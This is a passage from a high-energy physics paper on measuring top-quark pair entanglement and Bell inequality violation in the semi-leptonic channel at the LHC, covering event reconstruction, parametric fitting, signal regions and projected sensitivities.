[8] argued that the direct method naively has slightly better sensitivity since there is only one uncertainty whereas for the individual method, multiple quantities are measured so their uncertainties are combined. From Eqs. (3.18), (3.21), and (3.22) one sees that \(2\mathcal{C}(\rho)=-3D-1\) in the threshold region and \(2\mathcal{C}(\rho)=-3D_{3}-1\) in the boosted region. \(D\) is basis-independent because it is proportional to the trace of the spin correlation matrix \(C\). \(D_{3}\) is basis-dependent and we use the helicity basis. Experimentally, \(D\) has been measured by CMS [53]. They found a value of \(-0.237\pm 0.011\) without implementing an upper cut on \(m_{t\bar{t}}\) [4]. More recently, ATLAS measured \(-0.547\pm 0.02\) using an upper cut of 380 GeV on \(m_{t\bar{t}}\) [54].

### Bell Inequality Violation in \(t\bar{t}\)

To test Bell's inequality, we use the CHSH inequality, given in Eq. (13). Using fixed axes in the CHSH inequality, in the helicity basis this corresponds to the operator6 Footnote 6: At high \(p_{T}\) the helicity basis is known to result in large spin correlations [11] while near threshold the fixed beam basis has larger spin correlations. In the \(t\bar{t}\) system due to the contributions from the \(gg\) and \(q\bar{q}\) initial states, the Bell inequality violation near threshold is very small. For that reason we use the helicity basis and focus on the boosted region. Eq. (16) allows either sign choice in \(C_{33}\pm C_{11}\), and we choose \(C_{nn}-C_{rr}\) since it leads to the largest Bell inequality violation. \[B=C_{nn}-C_{rr},\hskip 28.452756ptB>\sqrt{2}\hskip 14.226378pt\text{ for Bell inequality violation.} \tag{29}\] In Fig. 4, we show \(B-\sqrt{2}\) in the phase space plane of \(\theta-m_{t\bar{t}}\). We see that Bell inequality violation is more appreciable at large \(m_{t\bar{t}}\) and large \(\theta\). We show how to construct the direct observable for \(B=C_{nn}-C_{rr}\), following Ref. [8]. Consider the azimuthal angles \(\phi^{\mathcal{A}}\) and \(\phi^{\mathcal{B}}\). The azimuthal angle \(\phi\) is the angle around the \(\hat{k}\) direction with \(\phi=0\) in the \(\hat{n}-\hat{k}\) plane. We construct \[\phi_{+}=\frac{\phi^{\mathcal{A}}+\phi^{\mathcal{B}}}{2},\hskip 28.452756pt\phi_{-}=\frac{\phi^{\mathcal{A}}-\phi^{\mathcal{B}}}{2}. \tag{30}\] From Eq. (8) one obtains \[\frac{1}{\sigma}\frac{\text{d}\sigma}{\text{d}\phi_{+}\text{d}\phi_{-}}=\frac{1}{2\pi^{2}}+\frac{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}{32}\left(\frac{C_{nn}+C_{rr}}{2}\cos(2\phi_{-})+\frac{C_{nn}-C_{rr}}{2}\cos(2\phi_{+})\right. \tag{31}\] \[\left.+\frac{C_{nr}+C_{rn}}{2}\sin(2\phi_{+})+\frac{C_{rn}-C_{nr}}{2}\sin(2\phi_{-})\right).\] Figure 4: The CHSH violation (\(B-\sqrt{2}\)) of the \(t\bar{t}\) system at parton-level in the \(\theta-m_{t\bar{t}}\) plane at \(\sqrt{s}=13\) TeV with no phase space cuts. CHSH violation is indicated by a value \((B-\sqrt{2})>0\). Values of \((B-\sqrt{2})\) that are \(<0\) are plotted as 0. The term proportional to \(C_{nn}-C_{rr}\) is the only term that is an even function with respect to \(\phi_{+}\) so it can be extracted through the asymmetry \[B=C_{nn}-C_{rr}=\frac{16}{\pi\,\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}\left(A_{\cos(2\phi_{+})}\right). \tag{3.32}\] Alternatively, we derive the full functional form by integrating out \(\phi_{-}\) and making a change of variable.
Defining \(\phi_{P}=\frac{\pi}{2}-\big{|}\frac{\pi}{2}-|\pi-\phi_{+}|\big{|}\), after integrating out \(\phi_{-}\), the distribution is then \[\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}\phi_{P}}=\frac{2}{\pi}+ \frac{\pi}{16}\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}\left(C_{nn}-C_{rr} \right)\cos(2\phi_{P}). \tag{3.33}\] Since we have derived the full functional form in Eq. (3.33), the value of \(B=C_{nn}-C_{rr}\) can also be extracted by a fit. ## 4 Results at the LHC ### Sketch of Expected Results Consider an observable \(\mathcal{O}\) that is sensitive to the presence of entanglement. One example would be the observable in Eq. (2.10). A useful observable will have a large difference between the measured value \(\mathcal{O}_{\mathrm{entangled}}\) for an entangled state and the predicted value \(\mathcal{O}_{\mathrm{null}}\) for a separable state with no entanglement. Let the measured value of the observable be \(\mathcal{O}_{\mathrm{entangled}}\pm\delta\mathcal{O}\) (corresponding to one standard deviation). The significance can be approximated by \[\mathrm{significance}\approx\frac{\mathcal{O}_{\mathrm{entangled}}-\mathcal{O }_{\mathrm{null}}}{\delta\mathcal{O}}. \tag{4.1}\] The sensitivity of the observable can be increased either by reducing the uncertainty \(\delta\mathcal{O}\) (for example, by collecting more data) or by choosing a quantum state with a larger expected value of \(\mathcal{O}_{\mathrm{entangled}}\) (for example, through phase space cuts). Reducing the uncertainty:The leptonic decay channels of \(W\to\ell\nu\) (\(\ell=e,\mu\)) have a branching fraction \(\mathrm{BR}(W\to\ell\nu)=0.21\)[55]. The branching fraction of \(t\bar{t}\) into the fully leptonic channel is thus \[\mathrm{BR}(t\bar{t}\to\ell\ell)=0.0455. \tag{4.2}\] There the complete final state consists of \(\ell^{-}\nu\bar{b}\ell^{+}\bar{\nu}b\), but we write it as \(\ell\ell\) for simplicity. The hadronic branching fraction of the \(W\) decay is \(\mathrm{BR}(W\to\mathrm{hadrons})=0.67\)[55], so the branching fraction of \(t\bar{t}\) into the semi-leptonic channel is \[\mathrm{BR}(t\bar{t}\to\ell j)=0.2877, \tag{4.3}\] which is about a factor of 6 larger than the fully leptonic channel. Again, we've written the final state as \(\ell j\) which represents either \(\ell^{-}\nu\bar{b}q\bar{q}^{\prime}b\) or \(q\bar{q}^{\prime}\bar{b}\ell^{+}\bar{\nu}b\). Assuming that the uncertainty on \(\mathcal{O}\) is statistics dominated, the uncertainty in the channel \(ij\) will scale as \(1/\sqrt{\mathrm{BR}(\bar{t}t\to ij)}\). Relative to the fully leptonic channel, we expect that the uncertainty on \(\mathcal{O}\) in the semi-leptonic channel is decreased by a factor of \(\sqrt{\mathrm{BR}(\bar{t}t\to\ell\ell)/\mathrm{BR}(\bar{t}t\to\ell j)}\) or a gain of a factor of 2.5. Naive Expectation:The correlation between the polarization of the top (or anti-top) and one of its decay products \(i\) is given by the spin analyzing power \(\kappa_{i}\), as discussed in Sec. 3.3 and Appendix C. The spin analyzing power of the anti-lepton (or lepton) in the top (or anti-top) decay is \(|\kappa_{\ell}|=1\); it is maximally correlated with the polarization of the top (or anti-top). For the hadronic decay of the top (or anti-top) the spin analyzing power is smaller and it is \(|\kappa_{q}|=0.64\). In the semi-leptonic channel, the leptonically-decaying top (or anti-top) uses the anti-lepton (or lepton) as a proxy for the polarization and the hadronically-decaying top (or anti-top) uses the jets as a proxy for the polarization. 
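The branching-fraction bookkeeping above fixes the naive statistical gain of the semi-leptonic channel. A short sketch of the arithmetic, using the rounded \(W\) branching fractions quoted above (the variable names are ours, for illustration only), is:

```python
from math import sqrt

# W branching fractions quoted above (l = e, mu combined)
br_w_lep = 0.21   # BR(W -> l nu)
br_w_had = 0.67   # BR(W -> hadrons)

br_ll = br_w_lep**2                # fully leptonic t-tbar
br_lj = 2 * br_w_lep * br_w_had    # semi-leptonic t-tbar (either top may decay leptonically)
print(br_ll, br_lj)                # compare with the 0.0455 and 0.2877 quoted in the text
                                   # (which use unrounded W branching fractions)

# Statistics-only: the uncertainty scales as 1/sqrt(BR), so relative to the fully
# leptonic channel the semi-leptonic uncertainty shrinks by roughly
print(sqrt(br_lj / br_ll))         # ~2.5
```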
The observable for semi-leptonic channel has a different pre-factor (see Eq. (3.13)) than the fully leptonic channel which scales the uncertainty by a factor of \(|(\kappa_{\ell}\kappa_{\ell})/(\kappa_{\ell}\kappa_{q})|=1/0.64\). Combining both of the previous effects, we expect that the relative significance between the decay channel \(t\bar{t}\to ab\) and \(t\bar{t}\to cd\) is given by \[\frac{\text{significance }(t\bar{t}\to ab)}{\text{significance }(t\bar{t}\to cd)}=\frac{\kappa_{a}\kappa_{b}}{\kappa_{c}\kappa_{d}} \sqrt{\frac{\text{BR}(t\bar{t}\to ab)}{\text{BR}(t\bar{t}\to cd)}}. \tag{4.4}\] Comparing the semi-leptonic to the leptonic we have \[\frac{\text{significance }(t\bar{t}\to\ell q)}{\text{significance }(t\bar{t}\to\ell\ell)}=0.64\sqrt{\frac{0.2877}{0.0455}}=1.60. \tag{4.5}\] We naively expect an improvement of 60%. There will also be a further improvement in the reconstruction efficiency of the semi-leptonic channel because there is a single neutrino as opposed to the fully leptonic channel which has two neutrinos, as we will exploit in our full analysis of the semi-leptonic channel. Following the scaling as in Eq. (4.5), the fully hadronic channel is expected to gain 29% over the fully leptonic channel. Given the challenges for the signal identification and background suppression for the fully hadronic channel, we leave this to a future study. ### Simulation We perform our analyses in two stages. The first is "parton-level", where events are generated without parton shower or hadronization. The uncertainty for parton-level events is always just statistical from the number of events. We further carry out a "detector-level" (or "reconstructed") study, which includes parton showering, hadronization, detector simulation, and event reconstruction. Parameters extracted from the detector-level analysis are always corrected using parametric fitting (see Sec. 4.3) and the uncertainties include the impact of the parametric fitting. In the few instances where detector-level results are shown without parametric fitting it will be noted explicitly. All events are generated with Madgraph 5[56] at \(\sqrt{s}=13\) TeV using the NNPDF 2.3 parton distribution function [57]. Three samples are generated: a \(t\bar{t}\) sample that decays through the fully leptonic channel and two \(t\bar{t}\) samples that decay through the semi-leptonic channel. In all samples we generate \(pp\to t\bar{t}\) at leading order and then the events are decayed using Madspin[58]. We apply a flat \(k\)-factor of 1.8 to account for the QCD correction to the total cross section [59]. The leptonic sample includes the decays \(t\bar{t}\to(b\ell^{+}\nu_{\ell})(\bar{b}\ell^{-}\bar{\nu}_{\ell})\) where \(\ell=e,\mu\). It is generated with no phase space cuts and only at parton-level. The semi-leptonic samples include both \(t\bar{t}\to(b\ell^{+}\nu_{\ell})(\bar{b}q\bar{q}^{\prime})\) and \(t\bar{t}\to(bq\bar{q}^{\prime})(\bar{b}\ell^{-}\bar{\nu}_{\ell})\) where \(q,q^{\prime}\) are light flavor quarks. The partonic final states are then showered and hadronized with Pythia 8[60] and go through the detector simulation Delphes 3[61]. We have two semi-leptonic samples in two kinematic regions according to the invariant mass of the \(t\bar{t}\) system. Resolved sample:We first start with the semi-leptonic sample with no additional phase space cuts, which we call the "resolved sample." 
The event selection used is \[p_{T}(j) >25\ \text{GeV}, |\eta(j)| <2.5, \tag{4.6a}\] \[p_{T}(\ell) >25\ \text{GeV}, |\eta(\ell)| <2.5,\] (4.6b) \[\not{E}_{T} >30\ \text{GeV}. \tag{4.6c}\] Jets are clustered with the anti-\(k_{T}\) algorithm with a separation \(\Delta R=\sqrt{\Delta\phi^{2}+\Delta\eta^{2}}=0.5\)[62]. This is approximately the event selection corresponding to a single lepton trigger [42; 43]. To compute the spin correlation matrix, it is necessary to fully reconstruct the final state kinematics. This requires identifying two \(b\)-jets, estimating the four-vector of the neutrino (or anti-neutrino), and assigning each \(b\)-jet to either the leptonic pair or the jet pair. We employ a modified version [63] of the pseudo-top algorithm [64; 65]. If the event contains only one \(b\)-tagged jet, the hardest jet from the non-\(b\)-tagged jet is assumed to be the second \(b\)-jet. The neutrino (or anti-neutrino) four-vector is determined from the two components of the missing transverse energy vector and from solving the on-shell condition of the neutrino and the on-shell condition of the leptonically-decaying \(W\) boson. The resulting reconstruction efficiency is defined as the number of events that are successfully reconstructed compared to the total events generated. The differential reconstruction efficiency is shown in Fig. 5. We find that the reconstruction efficiency peaks around 19% near threshold and decreases as the invariant mass of the system, and consequently the boost of the top and anti-top, increases. Boosted sample:The other semi-leptonic sample is generated with \[m_{t\bar{t}}>800\ \text{GeV}, \tag{4.7}\] at parton-level and we call it the "boosted sample." This corresponds to a boost factor \(\gamma>2.3\) in the center-of-mass frame for a fast-moving top quark. We first cluster events with the anti-\(k_{T}\) algorithm into jets with \(\Delta R_{\text{sub}}=0.2\) and apply the event selection from Eq. (4.6). In the boosted sample we will call these subjets, even though they are clustered from the full event. We then recluster the event into "fat jets" \[\Delta R_{\text{fat}}=1.5,\hskip 28.452756pt|\eta|<2.5,\hskip 28.452756ptp_{T}>3 00\ \text{GeV}. \tag{4.8}\] A single fat jet \(J\) is matched to three subjets \(j_{\rm sub}\) by selecting the three highest \(p_{T}\) subjets that satisfy \[\Delta R(J,j_{\rm sub})<\Delta R_{\rm fat}. \tag{11}\] The three matched subjets are required to constitute most of the transverse momentum of the fatjet \[\frac{p_{T}(j_{\rm sub1}+j_{\rm sub2}+j_{\rm sub3})}{p_{T}(J)}>0.9. \tag{12}\] The hadronic top is then taken to be the four-vector sum of the three subjets \(p_{\rm top}=p_{j_{\rm sub_{1}}}+p_{j_{\rm sub_{2}}}+p_{j_{\rm sub_{3}}}\). This procedure approximately corresponds to the fat jets and corresponding subjets that would result from the trimming procedure [66]. One of the three matched subjets is expected to be \(b\)-tagged. If none are \(b\)-tagged, the highest \(p_{T}\) of the matched subjets is assumed to be the \(b\)-jet. Finally, the mass of the hadronic top \(m=\sqrt{p_{\rm top}^{2}}\) is required to be close to the 175 GeV, and we choose it in the range \((150~{}{\rm GeV},225~{}{\rm GeV})\). Figure 5: Reconstruction efficiency in the \(\theta-m_{t\bar{t}}\) plane for the resolved semi-leptonic sample at \(\sqrt{s}=13~{}{\rm TeV}\). The weak (orange line) and strong (red line) regions correspond to signal regions in Sec. 4.4. The differential reconstruction efficiency for the boosted selection is shown in Fig. 6. 
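As an illustration of the leptonic-side kinematic reconstruction described above, the neutrino longitudinal momentum can be obtained from the missing transverse energy and the \(W\) on-shell condition by solving a quadratic equation. The sketch below is a simplified stand-in for the pseudo-top algorithm, not the exact implementation used here; the inputs and variable names are illustrative.

```python
import numpy as np

M_W = 80.4  # GeV

def neutrino_pz(lep, met_x, met_y, m_w=M_W):
    """Solve (p_lep + p_nu)^2 = m_W^2 for the neutrino p_z, treating the neutrino
    as massless with its transverse momentum fixed to the missing transverse energy.
    lep = (E, px, py, pz) of the charged lepton. Returns the two solutions;
    analyses commonly keep the one with smaller |p_z|."""
    E_l, px_l, py_l, pz_l = lep
    pt_l2 = px_l**2 + py_l**2
    mu = 0.5 * m_w**2 + px_l * met_x + py_l * met_y
    a = mu * pz_l / pt_l2
    disc = a**2 - (E_l**2 * (met_x**2 + met_y**2) - mu**2) / pt_l2
    if disc < 0:            # no real solution: take the real part (a common prescription)
        return a, a
    root = np.sqrt(disc)
    return a - root, a + root

# Example call with an illustrative lepton four-vector (GeV) and missing E_T
lep = (54.1, 40.0, 10.0, 35.0)
print(neutrino_pz(lep, met_x=30.0, met_y=-20.0))
```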
For moderately boosted tops where \(m_{t\bar{t}}\lesssim 1000\) GeV the resolved sample has a higher reconstruction efficiency. For tops with \(m_{t\bar{t}}\gtrsim 1000\) GeV the reconstruction efficiency of the boosted selection is better by more than an order of magnitude. We find that even for \(m_{t\bar{t}}\approx 2\) TeV the reconstruction efficiency remains above 3% in the signal regions where \(\theta\approx\pi/2\).

Figure 6: Reconstruction efficiency in the \(\theta-m_{t\bar{t}}\) plane for the boosted semi-leptonic sample generated at \(\sqrt{s}=13\) TeV. The weak (orange line) and strong (red line) regions correspond to signal regions in Sec. 4.4. The reconstruction efficiency is higher in the boosted sample than in the resolved sample for these two signal regions.

### Unfolding and Parametric Fitting

While the event selection cuts in Eq. (4.6) are very minimal in terms of the event identification, they have a sizable impact on the angular distributions that are used to extract the spin correlation coefficients. For example, consider the distribution of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) which, by Eq. (3.10), can be used to measure \(C_{nn}\). In Fig. 7, the red line shows the differential distribution of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) with no phase space cuts. This is the distribution that would be used to extract the value of \(C_{nn}\). The effect of the event selection is shown by the blue line. The selection distorts the distribution which invalidates the parameter estimation. The yellow line shows the effects of the detector simulation which further alters the distribution. In order to measure spin correlations accurately, it is necessary to restore distributions to their inclusive shapes. Let \(\vec{x}_{\rm truth}\) be the data if it could be measured with no detector effects or phase space cuts, and \(\vec{x}_{\rm detected}\) be the measured data. We call the effect of the detector and cuts "folding" \[\vec{x}_{\rm truth}\xrightarrow{\rm folding}\vec{x}_{\rm detected}=R\cdot\vec{x}_{\rm truth}, \tag{4.11}\] where the matrix \(R\) is the response matrix. Unfolding is the procedure that attempts to undo both detector effects and phase space cuts via \(\vec{x}_{\rm truth}=R^{-1}\cdot\vec{x}_{\rm detected}\). Generally, this is an ill-defined inversion problem which means that algorithm and regularization choices are required to obtain a result. These choices are actually very important in the case of entanglement and Bell inequality violation because the experimental sensitivity is entirely driven by the obtainable uncertainty on spin correlation measurements. Ideally the unfolding procedure itself would not substantially increase the uncertainty. Let the uncertainty from statistics only be \(\Delta_{\rm stat}\) and let the uncertainty after detector effects and unfolding be \(\Delta_{\rm tot}\), such that for a given measurement the increase from statistics only is a factor of \(\Delta_{\rm tot}/\Delta_{\rm stat}\). In Ref. [6] the increase is a factor of \(1.46-1.53\) while in Ref. [16] the factor is 0.88 (meaning that the final uncertainty is smaller than the statistics only uncertainty). Past studies on this topic, including Refs. [5; 6; 16], have used either the Iterative Bayesian (IB) method [67] or the Singular Value Decomposition (SVD) method [68] implemented in either the RooUnfold package [69] or TSVDUnfold package [68].
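As a numerical illustration of the folding relation in Eq. (4.11), a binned response matrix can be estimated from simulated (truth, detected) pairs and applied to a truth histogram. The binning, smearing, and selection below are toy assumptions, not the detector model used in this work.

```python
import numpy as np

def response_matrix(x_truth, x_detected, passed, bins):
    """Estimate R_ij = P(detected in bin i | truth in bin j), including losses
    from events that fail the selection (columns then sum to the efficiency)."""
    n = len(bins) - 1
    R = np.zeros((n, n))
    t_idx = np.digitize(x_truth, bins) - 1
    d_idx = np.digitize(x_detected, bins) - 1
    for j in range(n):
        in_bin = t_idx == j
        n_truth = np.sum(in_bin)
        if n_truth == 0:
            continue
        sel = in_bin & passed & (d_idx >= 0) & (d_idx < n)
        for i in range(n):
            R[i, j] = np.sum(sel & (d_idx == i)) / n_truth
    return R

# Toy example: folding a truth histogram gives the expected detected histogram
bins = np.linspace(-1.0, 1.0, 11)                        # e.g. bins of cos(theta_A)cos(theta_B)
rng = np.random.default_rng(1)
x_truth = rng.uniform(-1, 1, 50_000)                     # toy truth sample
x_detected = x_truth + rng.normal(0, 0.1, x_truth.size)  # toy smearing
passed = rng.uniform(0, 1, x_truth.size) < 0.5           # toy selection efficiency
R = response_matrix(x_truth, x_detected, passed, bins)
x_truth_hist, _ = np.histogram(x_truth, bins=bins)
x_detected_pred = R @ x_truth_hist                       # folded prediction, Eq. (4.11)
```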
For both of these methods one needs to choose both the number of bins to use in the unfolding and a parameter related to regularization. In previous studies it was stated that the resulting uncertainty of spin correlation measurements was stable with respect to different choices. Figure 7: Parton-level differential distribution of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) at \(\sqrt{s}=13\) TeV with no cuts applied (red) and with event selection from Eq. (4.6) (blue) and with detector simulation (yellow). By contrast we find that variations to these parameters can change the resulting uncertainty by up to 75%. As there are many fewer events in the detected sample compared to the truth sample, some level of instability is expected. These variations are shown in detail in Appendix A along with results from an alternative unfolding method called the One-at-a-time Strict Bound method (OSB) [70]. In our work, we apply the more common procedure used by the LHC experiments of parametric fitting. While unfolding is typically applied at the level of distributions, parametric fitting is applied to the parameter estimation. Consider a parameter \(\Theta\), then schematically parametric fitting can be described as \[\vec{x}_{\rm truth}(\Theta)\xrightarrow{\rm folding}\vec{x}_{\rm predicted}( \Theta)=R\cdot\vec{x}_{\rm truth}(\Theta). \tag{4.12}\] The data \(\vec{x}_{\rm detected}\) is fit to \(\vec{x}_{\rm predicted}(\Theta)\) to extract the value of \(\Theta\). Here there is no need to invert the response matrix and therefore it is not dependent on a regularization parameter. We find this method to be more stable and more intuitive than unfolding. The uncertainty on the parameter \(\Theta\) can be calculated by performing pseudo-experiments. In our work, we carry out 1000 pseudo-experiments. More details are presented in Appendix A. ### Signal Regions From Figs. 3 and 4, it is clear that the size of entanglement and of Bell inequality violation differs over phase space. To maximize the observable signals we specify four signal regions. These are shown graphically in Fig. 8 as non-rectangular cuts in the \(\theta-m_{t\bar{t}}\) plane. The "threshold" region (the green region in Fig. 8) selects events that are very close to threshold. There is an additional cut in this region to further enhance the significance, which is requiring the velocity of the \(t\bar{t}\) system in the lab frame, \(\beta=p_{t\bar{t}}/m_{t\bar{t}}\), to satisfy \[|\beta|\leq 0.9, \tag{4.13}\] as proposed by Ref. [8]. In this region, the \(t\bar{t}\) pair is primarily produced in a spin singlet state from gluon fusion [15]. The \(t\bar{t}\) cross section is also largest near threshold. These facts together make this region ideal for detecting entanglement. The "boosted" region (the blue region in Fig. 8) selects events where the top and anti-top are moderately boosted and the angle \(\theta\) is sizable. This region corresponds to the other entangled region from Fig. 3. At high \(p_{T}\), the \(t\bar{t}\) pair is primarily produced in a spin triplet state from incoming gluons, however due to the falling cross section at larger \(m_{t\bar{t}}\) we expected lower detection significance compared to the threshold region. The "weak" region (the orange region in Fig. 8) selects events at larger \(m_{t\bar{t}}\) and larger \(\theta\). From Fig. 4, it can be seen that unlike for entanglement, Bell inequality violation is only observable for large \(m_{t\bar{t}}\). Finally, the "strong" region (the red region in Fig. 
8) is even more restrictive on \(m_{t\bar{t}}\) and \(\theta\). While the strong region is expected to more effectively isolate the phase space with Bell inequality violation, there are fewer events with the more restrictive cuts. We include this region in addition to the weak region because a priori we do not know which region will have more sensitivity. Note that the weak region is a subset of the boosted region and the strong region is a subset of both the boosted region and the weak region. ### Entanglement Results Before presenting results on entanglement, in Table 1 we show the measured values of the elements of the spin correlation matrix \(C_{ij}\) in the helicity basis in the threshold region. The values of \(C_{ij}\) are measured using Eq. (3.13). Parton-level results contain no event selection and detector-level results are fully corrected. The uncertainties on parton-level results are purely statistical while the uncertainties on detector-level results are larger because they include additional sources of uncertainty from the detector simulation and from the parametric fitting. The uncertainties are different for different entries of the \(C_{ij}\) matrix because each distribution gets distorted by detector effects in different ways. The distribution itself also impacts the resulting uncertainty. For the entries of the spin correlation matrix parametric fitting increases the uncertainties by a factor of \(2-4\). The outcomes, however, are quite stable and robust. Figure 8: Signal regions in the \(\theta-m_{t\bar{t}}\) plane. The regions for entanglement are: threshold (green) and boosted (blue). The regions for Bell inequality violation are: weak (orange) and strong (red, overlap in orange). Results for entanglement are given by two times the concurrence \(2\mathcal{C}(\rho)\), where the concurrence is given by Eq. (3.18). Entanglement is indicated by \(2\mathcal{C}(\rho)>0\). The factor of two is included for easier comparison with other studies [6; 8]. Results at parton-level are shown in Table 2 (top). The uncertainty is purely statistical taking the number of events as \(\epsilon N_{\rm parton}\) where \(\epsilon\) is the average reconstruction efficiency for that signal region and \(N_{\rm parton}=k\times\mathcal{L}\times\sigma_{\rm LO}\), where the \(k\)-factor is 1.8 and the luminosity for the existing LHC data is 139 fb\({}^{-1}\). The individual results are calculated from Eq. (3.13) and the direct results are calculated from Eqs. (3.27) and (3.28). Since all results are well above a significance of \(5\sigma\), we show the precision which is given by \(\Delta\mathcal{C}(\rho)/\mathcal{C}(\rho)\). Comparing the threshold and boosted signal regions, we see that while the boosted region has a larger concurrence, the threshold region has about an order of magnitude of more events, yielding an uncertainty about 3 times smaller. Furthermore, the direct method reduces the uncertainty on the parton-level results by about 20% which is consistent with Ref. [8]. Entanglement results at detector-level after parametric fitting are shown in Table 2 (bottom). The value of \(N_{\rm detected}\) accounts for detector efficiencies. The central value of \(2\mathcal{C}(\rho)\) does not change relative to the parton-level result which is expected. The uncertainty, however, is larger than the statistics-only result by roughly a factor of 3 for the individual method and a factor of 2 for the direct method. The precision as a function of luminosity is shown in Fig. 9 (left) at parton-level. 
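Since the parton-level uncertainties are statistics-dominated, the precision curves in Fig. 9 follow a simple \(1/\sqrt{\mathcal{L}}\) scaling. The sketch below illustrates this using the threshold-region precisions from Table 2; the function and variable names are ours, for illustration only.

```python
import numpy as np

def precision_at(lumi, precision_ref, lumi_ref=139.0):
    """Statistics-only scaling: precision ~ 1/sqrt(N) ~ 1/sqrt(luminosity)."""
    return precision_ref * np.sqrt(lumi_ref / lumi)

# Threshold region, direct method (Table 2): 1.6% at parton-level and 3.0% after
# reconstruction, both quoted at 139 fb^-1.
for lumi in (139.0, 300.0, 3000.0):
    print(lumi, precision_at(lumi, 0.016), precision_at(lumi, 0.030))

# Naive 1/sqrt(L) estimate of the luminosity needed for a 1% measurement
for p0 in (0.016, 0.030):
    print(139.0 * (p0 / 0.01) ** 2)
```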
With only statistical errors, the parton-level result predicts that a 1% precision can be achieved with around 300 fb\({}^{-1}\), corresponding to the end of LHC Run-3. The results from the fully leptonic channel are also shown for comparison. This channel is calculated at parton-level using the same efficiency that was calculated in the semi-leptonic sample.7 Our calculation from Sec. 4.1 predicted an improvement of 60% which is what the parton-level result also finds. Our leptonic result is consistent with Ref. [8] (see Appendix B for a full comparison). Footnote 7: The actual efficiency for the leptonic channel [6] is expected to be lower than in the semi-leptonic channel. Figure 9 (right) shows the precision as a function of luminosity with the detector simulation. Including the detector effects increases the data required to reach 1% precision to \begin{table} \begin{tabular}{c|r r r} \hline parton-level & \(n\) & \(r\) & \(k\) \\ \hline \(n\) & \(-0.500\pm 0.006\) & \(0.000\pm 0.006\) & \(0.000\pm 0.006\) \\ \(r\) & \(-0.004\pm 0.006\) & \(-0.361\pm 0.006\) & \(-0.010\pm 0.006\) \\ \(k\) & \(-0.006\pm 0.006\) & \(-0.004\pm 0.006\) & \(-0.656\pm 0.006\) \\ \hline detector-level & \(n\) & \(r\) & \(k\) \\ \hline \(n\) & \(-0.510\pm 0.012\) & \(0.000\pm 0.023\) & \(0.001\pm 0.019\) \\ \(r\) & \(0.001\pm 0.022\) & \(-0.359\pm 0.023\) & \(0.000\pm 0.030\) \\ \(k\) & \(-0.005\pm 0.019\) & \(0.000\pm 0.026\) & \(-0.655\pm 0.020\) \\ \end{tabular} \end{table} Table 1: The spin correlation matrix \(C_{ij}\) at parton-level (top) and at detector-level (bottom) in the threshold region generated at \(\sqrt{s}=13\) TeV with \(\mathcal{L}=139\) fb\({}^{-1}\). roughly 1200 fb\({}^{-1}\). Even with the current LHC dataset, a detection of \(5\sigma\) is still easily obtainable. ### Bell Inequality Violation Results Table 3 (top) presents results for Bell inequality violation at parton-level. Bell inequality violation is measured by \((B-\sqrt{2})\) where \(B\) is given by Eq. (3.29). Results with the individual method are calculated from Eq. (3.13) and with the direct method from Eq. (3.32). Bell inequality violation occurs when \((B-\sqrt{2})>0\). With only statistical uncertainties, we find that Bell inequality violation can only be probed at \(\approx 2\sigma\) with 300 fb\({}^{-1}\). With the projected \begin{table} \begin{tabular}{||c||c c c||c||} \hline \multirow{2}{*}{Parton-level} & \multirow{2}{*}{Efficiency} & \(\epsilon\,N_{\text{parton}}\) & \multicolumn{2}{c||}{\(2\mathcal{C}(\rho)\)} & \multirow{2}{*}{Precision} \\ & & \((139\,\text{fb}^{-1})\) & (Individual) & (Direct) \\ \hline Threshold & 0.16 & \(1.26\times 10^{6}\) & \(0.518\pm 0.010\) & \(0.522\pm 0.008\) & 1.6\% \\ \hline Boosted & 0.13 & \(1.15\times 10^{5}\) & \(0.576\pm 0.032\) & \(0.566\pm 0.027\) & 4.8\% \\ \hline \hline \multirow{2}{*}{Reconstructed} & \(N_{\text{detected}}\) & \multicolumn{2}{c||}{\(2\mathcal{C}(\rho)\)} & \multirow{2}{*}{Precision} \\ & \((139\,\text{fb}^{-1})\) & (Individual) & (Direct) & \\ \hline Threshold & \(1.26\times 10^{6}\) & \(0.523\pm 0.033\) & \(0.522\pm 0.016\) & 3.0\% \\ \hline Boosted & \(1.15\times 10^{5}\) & \(0.549\pm 0.084\) & \(0.552\pm 0.052\) & 9.5\% \\ \hline \end{tabular} \end{table} Table 2: Measurements of \(2\mathcal{C}(\rho)\) generated at \(\sqrt{s}=13\) TeV and \(\mathcal{L}=139\) fb\({}^{-1}\) at parton-level (top) and after detector simulation, reconstruction, and parametric fitting (bottom). Entanglement is indicated by \(2\mathcal{C}(\rho)>0\). 
The efficiency indicated is the average over the specified signal region. The precision uses the direct measurement both at parton-level and at reconstruction-level. Figure 9: Expected precision of entanglement detection as a function of the integrated luminosity at the 13 TeV LHC at parton-level (left) and after detector simulation, reconstruction, and parametric fitting (right). luminosity of the HL-LHC the significance is above \(5\sigma\). Bell inequality violation at detector-level after parametric fitting is shown in Table 3 (bottom). The individual measurements have an uncertainty that increases by a factor of 1.6 compared to the parton-level results. The direct measurements, which use Eq. (3.33), on the other hand increase by a factor of 2.3 and are actually worse than the individual measurements. This is because the uncertainty depends on the shape of the distribution and the properties of the detector smearing. With 300 \(\mathrm{fb}^{-1}\) the significance is only \(1.3\sigma\) and even at the HL-LHC the significance only reaches \(4.1\sigma\). The significance as a function of luminosity is shown in Fig. 10 (left) at parton-level. We show results from the leptonic channel for comparison. With the estimation from Sec. 4.1, we expected a 60% improvement over the leptonic result at the parton level, while we obtain a 54% improvement. Our leptonic result is consistent with Ref. [8] (see Appendix B for a full comparison). The detector-level result is shown in Fig. 10 (right). Comparing to the detector-level leptonic [6] results we find a factor of 3 improvement thanks to the higher efficiency in our channel (see Appendix B). ## 5 Summary and Conclusions There has been increasing interest in testing quantum entanglement and violations of Bell inequalities at high-energy colliders, which explore physics at much shorter space-time scales than traditional quantum experiments. The \(t\bar{t}\) system is an exemplar of a two qubit system where the detailed quantum mechanical properties of the system are exhibited through the production and decay of the \(t\) and \(\bar{t}\). 
